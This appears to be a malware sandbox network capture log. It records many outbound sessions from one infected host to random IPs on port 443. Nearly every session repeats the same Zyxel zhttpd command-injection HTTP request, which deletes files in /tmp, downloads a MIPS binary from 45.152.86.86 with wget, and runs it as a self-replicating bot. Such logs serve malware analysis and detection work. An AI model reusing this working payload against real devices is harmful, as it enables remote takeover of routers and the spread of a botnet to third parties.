                              Mar 31, 2024 08:41:56.187661886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7326192.168.2.135523289.38.126.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187710047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7327192.168.2.1360108201.138.167.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187752008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7328192.168.2.135995673.174.191.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187783003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7329192.168.2.1338274120.222.227.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187813044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7330192.168.2.135506223.136.20.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187849998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7331192.168.2.134778632.52.239.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187891960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7332192.168.2.135608867.72.178.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187911987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7333192.168.2.133284488.63.78.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187952995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7334192.168.2.13461768.43.57.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187983990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7335192.168.2.134972694.220.106.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188019037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7336192.168.2.135864212.83.188.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188050032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7337192.168.2.1360576139.94.36.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188076973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7338192.168.2.1357486189.36.95.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188118935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7339192.168.2.1339574167.26.150.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188149929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7340192.168.2.133773834.102.194.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188179970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7341192.168.2.1334850192.148.132.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188237906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7342192.168.2.1351654219.23.97.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188292980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7343192.168.2.1341972114.53.183.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188319921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7344192.168.2.1338160184.246.39.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188347101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7345192.168.2.1350800217.71.98.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188424110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7346192.168.2.134761868.22.249.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188452959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7347192.168.2.1341124102.232.142.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188491106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7348192.168.2.1358774156.98.20.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188519001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7349192.168.2.13360421.116.83.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188544989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7350192.168.2.1357596176.82.233.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188584089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7351192.168.2.1343934100.245.118.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188621044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7352192.168.2.1351730120.165.169.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188641071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7353192.168.2.134059486.62.218.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188690901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7354192.168.2.135549837.79.176.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188745975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7355192.168.2.1345470136.139.203.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188781977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7356192.168.2.1344992101.28.145.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188815117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7357192.168.2.1350754103.72.128.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188863993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7358192.168.2.1357046107.188.59.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188900948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7359192.168.2.1343292204.32.219.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188944101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7360192.168.2.1348880177.143.83.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.188975096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7361192.168.2.1336714198.35.241.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189004898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7362192.168.2.135238450.170.157.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189060926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7363192.168.2.134658468.177.20.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189091921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7364192.168.2.135067286.82.35.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189131021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7365192.168.2.135361863.115.169.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189153910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7366192.168.2.134204673.23.89.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189225912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7367192.168.2.1345732163.167.54.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189277887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7368192.168.2.1359126136.81.215.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189320087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7369192.168.2.136062287.122.42.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189377069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7370192.168.2.1332936164.187.118.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189428091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7371192.168.2.1350444105.11.30.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189455986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7372192.168.2.1345126108.248.188.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189518929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7373192.168.2.134908291.152.185.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.189562082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7374192.168.2.1343594178.194.185.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.192986965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7375192.168.2.1355070171.249.21.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193011999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7376192.168.2.1348146137.43.128.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193049908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7377192.168.2.1339072136.7.221.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193097115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7378192.168.2.134119434.175.72.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193125963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7379192.168.2.1344188139.53.149.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193159103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7380192.168.2.1344858105.251.141.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193232059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7381192.168.2.1338806201.122.205.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.193300962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7382192.168.2.1341292140.212.84.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197700977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7383192.168.2.13533622.248.25.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197735071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7384192.168.2.1336764101.226.228.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197760105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7385192.168.2.1337832206.177.90.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197792053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7386192.168.2.133547274.217.233.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197854996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7387192.168.2.1350694177.87.37.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197896957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7388192.168.2.133655674.194.65.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197940111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7389192.168.2.1345006144.183.220.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.197984934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7390192.168.2.1358988173.58.132.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198028088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7391192.168.2.135320076.69.22.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198060036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7392192.168.2.134260857.70.46.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198101044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7393192.168.2.1338718187.40.47.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198132992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7394192.168.2.1346158221.81.114.81443
                              TimestampBytes transferredDirectionData
